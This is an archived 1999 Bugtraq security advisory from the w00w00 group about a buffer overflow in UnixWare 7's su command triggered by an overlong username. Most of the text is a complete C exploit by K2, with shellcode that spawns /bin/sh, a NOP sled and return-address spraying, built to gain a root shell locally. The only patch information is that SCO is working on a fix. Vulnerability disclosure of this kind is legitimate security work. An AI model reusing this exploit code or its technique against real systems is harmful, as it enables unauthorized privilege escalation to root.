Archive : 1999 : november : scosu - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku
[w00giving '99 #5 and w00news]: UnixWare 7's su



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Пт, 26 ноя 1999  04:16:41

   От: Matt Conover <shok@CANNABIS.DATAFORCE.NET>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: [w00giving '99 #5 and w00news]: UnixWare 7's su

--------------------------------------------------------------------------------




w00w00 Security Development (WSD)

http://www.w00w00.org/advisories.html



----------------------------------------------------------------------------

Sorry, we've been really tied up these past 2-3 weeks and have been unable

to write up the advisories.  We'll send three SCO advisories tonight to

make up for it.  We should have some interesting ones within the next two

weeks (it's really hard to find the time to write up the exploits and

advisories).



You'll noticed we jumped from #3 to #5.  w00giving advisory #4 has been

available on http://www.w00w00.org/advisories.html for 2-3 weeks, but

it wasn't posted to this list.  w00w00.org has had hits from 55 different

countries as of yesterday.



If you are going to send out advisories, please cc them to

news@technotronic.com, also.  You can subscribe to it by sending

"subscribe news" to majordomo@technotronic.com.  Technotronic is a good

site and beginning now, you will always see our advisories/articles/code

posted on there first (order of release: w00w00.org,

news@technotronic.com, news groups, bugtraq).

----------------------------------------------------------------------------



Discovered by: K2 (ktwo@ktwo.ca)



The su command on SCO's UnixWare 7 has improper bounds checking on the

username passed (via argv[1]), which can cause a buffer overflow when

a lengthy username is passed.



----------------------------------------------------------------------------

Exploit (by K2):



// UnixWare7 /usr/bin/su local, K2, revisited Oct-30-1999

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>



char shell[] =

 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"

 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"

 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"

 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"

 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"

 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff\xff\xff\xff";



const char x86_nop=0x90;

long nop,esp;

long offset=DEFOFF;

char buffer[SIZE];



long get_esp() { __asm__("movl %esp,%eax"); }



int main (int argc, char *argv[])

{

    register int i;



    if (argc > 1) offset += strtol(argv[1], NULL, 0);

    if (argc > 2) nop += strtoul(argv[2], NULL, 0);

    else

        nop = NOPDEF;

    esp = get_esp();



    memset(buffer, x86_nop, SIZE);

    memcpy(buffer+nop, shell, strlen(shell));



    for (i = nop+strlen(shell); i < SIZE-4; i += 4)

        *((int *) &buffer[i]) = esp+offset;



    printf("offset = [0x%x]\n",esp+offset);

    execl("/usr/bin/su", "su", buffer, NULL);



    printf("exec failed!\n");

    return 0;

}



----------------------------------------------------------------------------

Patch:



SCO is in the process of fixing a list of vulnerabilities we sent a few

weeks ago.



----------------------------------------------------------------------------
test server